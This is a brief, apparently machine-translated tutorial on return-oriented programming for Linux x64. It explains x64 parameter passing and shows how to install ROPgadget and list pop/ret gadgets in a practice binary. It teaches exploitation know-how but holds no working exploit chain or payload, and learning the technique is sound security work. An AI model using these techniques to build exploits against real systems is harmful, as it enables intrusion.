linux_x64 Knowledge of ROP

steamed rice God talk about rop:http://www.vuln.cn/6644

0x00 ROP

ROP is all called return-oriented programming (return-oriented programming), an advanced memory attack technique that can be used to circumvent the various common defenses of modern operating systems (such as memory unavailability, code signing, and so on).

the difference between 0x01 linux_64 and linux_86

The difference between linux_64 and linux_86 is mainly two points: first, the range of memory addresses is changed from 32 to 64 bits. However, the memory address that can be used cannot be greater than 0X00007FFFFFFFFFFF, or an exception will be thrown. Next is the function parameter transfer way has changed, x86 parameters are stored on the stack, but in x64 in the first six parameters are saved in Rdi, RSI, RDX, RCX, R8 and R9, if there are more parameters will be saved on the stack.

0x02 looking for gadgets

Linux installation ropgadget

git clone https://github.com/JonathanSalwan/ROPgadget.git
CD Ropgadget
sudo python setup.py install

using Ropgadget

~$ ropgadget--binary level4--only "Pop|ret"

Gadgets Information
============================================================
0x00000000004008ac:pop R12; Pop R13; Pop R14; Pop R15; Ret
0x00000000004008ae:pop R13; Pop R14; Pop R15; Ret
0x00000000004008b0:pop R14; Pop R15; Ret
0x00000000004008b2:pop R15; Ret
0x00000000004008ab:pop RBP; Pop R12; Pop R13; Pop R14; Pop R15; Ret
0x00000000004008af:pop RBP; Pop R14; Pop R15; Ret
0x0000000000400700:pop RBP; Ret
0x00000000004008b3:pop Rdi; Ret
0x00000000004008b1:pop RSI; Pop R15; Ret
0x00000000004008ad:pop RSP; Pop R13; Pop R14; Pop R15; Ret
0x0000000000400601:ret
0x0000000000400682:ret 0x2009

linux_x64 Knowledge of ROP